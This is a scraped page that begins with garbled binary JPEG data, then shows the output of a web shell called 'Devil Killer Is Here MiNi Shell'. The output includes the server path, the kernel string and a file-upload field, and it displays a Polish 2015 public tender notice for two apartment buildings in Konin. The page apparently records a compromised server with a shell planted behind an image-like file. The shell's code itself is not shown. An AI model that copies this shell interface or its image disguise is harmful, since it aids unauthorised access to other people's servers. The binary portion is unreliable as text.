JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151217/346564-N-2015.html

<p class="kh_header"><b>Konin: Budowa dwóch budynków mieszkalnych wielorodzinnych
wraz z zagospodarowaniem terenu przy ul. Piłsudskiego w Koninie 
- Bud. nr 1 i 2.</b><br>
<b>Numer ogłoszenia: 346564 - 2015; data zamieszczenia: 17.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Towarzystwo Budownictwa Społecznego Sp. z o. o. , ul. 3 Maja 21, 62-500 Konin, woj. wielkopolskie, tel. (063) 245 75 41, faks (063) 245 76 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mtbs.konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa dwóch budynków mieszkalnych wielorodzinnych
wraz z zagospodarowaniem terenu przy ul. Piłsudskiego w Koninie 
- Bud. nr 1 i 2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z budową dwóch budynków mieszkalnych wielorodzinnych wraz z zagospodarowaniem terenu przy ul. Piłsudskiego w Koninie - bud. nr 1 i 2.

1. Podstawowe dane dotyczące przedmiotu zamówienia: 

1.1.Budynek nr 1
- Powierzchnia zabudowy 		                =    471,80 m2
- Powierzchnia użytkowa mieszkań -stan wykończony	=    ca 1 134,00 m2
- Powierzchnia miejsc postojowych		=    506,30 m2
- Kubatura kondygnacji nadziemnych		=    6 339,70 m3
- Kubatura kondygnacji podziemnych 		=    2 613,96 m3
- Razem kubatura budynku				=    8 953,66 m3
- Ilość kondygnacji 					=    4
- Liczba klatek schodowych				=    2	
- Liczba mieszkań					=    20	
- Ilość miejsc postojowych w hali garażowej	=    16	
	
1.2.	Budynek nr 2
- Powierzchnia zabudowy 				=    720,05 m2
- Powierzchnia użytkowa mieszkań-stan wykończony	=    ca 1 710,00 m2 
- Powierzchnia boksów garażowych			=    913,10 m2
- Kubatura cz. mieszkalnej				        =    10 289,51 m3
- Kubatura cz. piwniczno-garażowej			=    3 872,61 m3
- Razem kubatura budynku				        =    14 162,12 m3
- Ilość kondygnacji 					        =    4
- Liczba klatek schodowych				        =    3	
- Liczba mieszkań				                =    32	
- ilość miejsc postojowych w hali garażowej	        =    29
Hala garażowa winna posiadać miejsca postojowe dla 45 samochodów osobowych.

1.3.Windy
Windy przystosowane do przewozu osób niepełnosprawnych poruszających się na wózkach inwalidzkich (osoba na wózku + osoba towarzysząca) do zainstalowania wewnątrz budynku. Urządzenie wyposażone w nowoczesną wciągarkę z silnikiem synchronicznym ze stałymi magnesami zapewniającą komfortowa i cicha eksploatacje przy zachowaniu minimalnych gabarytów urządzenia. Zastosowanie napędu regeneracyjnego z odzyskiem energii elektrycznej do sieci budynku pozwalający na oszczędności w czasie eksploatacji urządzenia. Napęd przenoszony przez pasy, zaopatrzone w system monitoringu 24/7 nieprzerwanie kontrolujący stan stalowych linek w pasach, podnosząc poziom bezpieczeństwa użytkowania dźwigu.

1.4.Elewacje.
System elewacji powinien charakteryzować się I klasą odporności wytrzymałościowej - nie mniej niż 18J oraz farbą mikrosilikonową samoczyszczącą.

Szczegóły dotyczące parametrów technicznych oraz zakresu robót do wykonania zawarte są załączonych do SIWZ: 
     1. dokumentacji projektowej,
     2. specyfikacji technicznej wykonania i odbioru robót   budowlanych,.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w  art. 67 ust. 1 pkt 6 ustawy Pzp, w okresie 3 lat od  udzielenia  zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówienia .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca  składając ofertę musi wnieść  wadium  w wysokości  200.000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający   nie   dokonuje   opisu   sposobu   dokonywania  oceny spełniania warunku.
Ocena  spełniania  warunku dokonana  zostanie zgodnie z formułą  spełnia - nie spełnia na podstawie oświadczenia    określonego w części III pkt. 8.1 SIWZ. Z treści załączonego oświadczenia musi wynikać jednoznacznie,iż w/w warunek wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy w tym okresie wykonał co najmniej jedno zadanie polegające na wybudowaniu budynku mieszkalnego wielorodzinnego  lub budynku użyteczności publicznej o powierzchni użytkowej minimum 2.000,00 m2 i o wartości nie mniejszej niż 5.000.000,00 zł,-(brutto) .

Przez budynek użyteczności publicznej Zamawiający rozumie budynek przeznaczony dla administracji publicznej, wymiaru sprawiedliwości, kultury, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, budynek biurowy, socjalny oraz inny budynek ogólnodostępny przeznaczony do powykonywania podobnych funkcji .

W przypadku składania oferty wspólnej warunek zostanie uznany przez zamawiającego za spełniony , jeżeli  wykonawcy składający ofertę wspólną będą spełniać go łącznie. 

Ocena spełnienia warunku dokonana zostanie zgodnie z formułą  spełnia - nie spełnia  na podstawie dokumentu określonego w części III pkt.8.2 SIWZ . 
Z treści załączonego dokumentu  musi wynikać jednoznacznie,iż w/w warunek wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający   nie   dokonuje   opisu   sposobu   dokonywania  oceny spełniania  warunku.
Ocena  spełniania  warunku dokonana  zostanie zgodnie z formułą  spełnia -nie spełnia  na podstawie oświadczenia  określonego w części III pkt. 8.1.SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca będzie dysponował osobami zdolnymi do wykonania zamówienia legitymującymi się doświadczeniem i kwalifikacjami odpowiednimi do funkcji, jakie zostaną im powierzone, które będą odpowiedzialne za kierowanie robotami budowlanymi w specjalnościach: 
a)kierownikiem budowy w branży budowlanej (minimum 1 osoba), który winien posiadać:
-uprawnienia budowlane do kierowania robotami budowlanymi, w specjalności konstrukcyjno - budowlanej  bez ograniczeń ,
- minimum 2- letnie doświadczenie w pełnieniu funkcji kierownika budowy od momentu uzyskania uprawnień  na co najmniej  jednym  zadaniu polegającym na wybudowaniu budynków mieszkalnych wielorodzinnych lub budynków użyteczności publicznej o powierzchni  użytkowej minimum  2.000,00 m2 i o wartości nie mniejszej niż 5.000.000,00 zł,- (brutto) .

b)  kierownikami robót w branży sanitarnej i elektrycznej posiadającymi:
-  uprawnienia budowlane do kierowania robotami budowlanymi, w specjalności:
           * instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych 
             i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych bez       ograniczeń (min. 1 osoba),
            * instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
               i elektroenergetycznych  bez ograniczeń (min. 1 osoba),
*minimum 2- letnie doświadczenie w pełnieniu funkcji kierownika budowy od momentu uzyskania uprawnień  na minimum 1 budowie .

Kierownicy robót (wyszczególnionych  branż)  muszą być wpisani na listę członków       właściwej  izby samorządu   zawodowego na podstawie ustawy z dnia 15 grudnia 2000 r.   o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów    (Dz.U. z 2001r., Nr 5, poz.42 z poźn. zm.).

c) Zamawiający na podstawie art.29 ust. 4 pkt. 4 w związku z art. 36 ust. 2 pkt. 9 lit. d) ustawy z dnia 29 stycznia 2004 Prawo zamówień publicznych wymaga, aby osoby biorące udział w realizacji zamówienia, zajmujące poniższe stanowiska, były zatrudnione w okresie realizacji zamówienia na podstawie umowy o pracę na pełen etat z uwzględnieniem personelu ewentualnych podwykonawców tj.:  
1)	co najmniej 50 robotników budowlanych, 
2)	co najmniej   2 spawaczy,
3)	co najmniej   5 hydraulików,
4)	co najmniej   4 elektryków. 

Wykonawca zobowiązany jest, przez cały okres realizacji umowy, przestrzegać deklaracji zatrudnienia osób na podstawie umowy o pracę, na stanowiskach i w liczbie wymaganej w SIWZ, zgodnie z oświadczeniem złożonym w  postępowaniu poprzedzającym zawarcie umowy( wg zał. nr 4 do SIWZ) oraz zobowiązany jest - na każde żądanie Zamawiającego - w terminie 5 dni od dnia odebrania przez Wykonawcę skierowanego przez Zamawiającego żądania, do przedstawienia dokumentu, z którego treści będzie wynikało, iż dana osoba jest zatrudniona na podstawie umowy o pracę.
W przypadku składania oferty wspólnej warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie.

Ocena spełnienia warunku dokonana zostanie zgodnie z formułą  spełnia - nie spełnia, na podstawie dokumentu określonego w części III pkt.8.3 SIWZ.
Z treści załączonych dokumentów musi wynikać jednoznacznie,iż w/w warunek wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli :
-Wykonawca wykaże się przychodem za każdy rok obrotowy tj .lata 2012-2014 a jeżeli okres prowadzenia jest krótszy - za ten okres, (na podstawie rachunku zysku i strat - pozycja przychód netto ze  sprzedaży, w tym produkcja budowlana w wysokości minimum (średnio) 4.000.000 zł .
-Wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową do zaciągania kredytu w wysokości min. 3.000.000,00 zł .
-Wykonawca będzie posiadał opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż  2.000.000,00 zł.

W przypadku składania oferty wspólnej warunek zostanie uznany przez zamawiającego za spełniony , jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.

Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia określonego w części III pkt.8.4 SIWZ.
Z treści załączonych dokumentów musi wynikać jednoznacznie,iż w/w warunek wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym i osobach zdolnych do wykonania  zamówienia  lub zdolnościach finansowych innych podmiotów , niezależnie od charakteru prawnego łączących go  z  nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie  dysponował zasobami niezbędnymi do realizacji  zamówienia, a w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów /oryginał zobowiązania/ do oddania mu  do dyspozycji  niezbędnych zasobów na okres korzystania z  nich przy wykonywaniu  zamówienia  (art.26 ust.2b ustawy). 

Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.

II.Zobowiązanie podmiotu trzeciego powinno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia wykonawcy, ubiegającemu się o zamówienie odpowiedniego zasobu orazwinno wskazywać:
1. Zakres dostępnych wykonawcy zasobów innego podmiotu.
2. Sposób wykorzystania zasobów innego podmiotu, przez wykonawcę przy
wykonywaniu zamówienia.
3. Charakter stosunków łączących wykonawcę z innym podmiotem.
4. Zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Skrócenie terminu realizacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje zmiany treści umowy z wykonawcą robót w przypadku wystąpienia  jednej  z niżej wymienionych okoliczności . 

a) w zakresie zmian spowodowanych warunkami atmosferycznymi , w szczególności:
- klęski żywiołowe, warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń , dokonywanie odbiorów, 

b)wysokości wynagrodzenia umownego, które może ulec zmianie w przypadku ustawowej zmiany obowiązującej stawki podatku VAT.

2.Nie wymaga aneksowania zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy - w szczególności kierownika budowy oraz wynikających ze zmian w rejestrach publicznych  pod warunkiem , że spełnia on wymagania zgodne z SIWZ .</p>
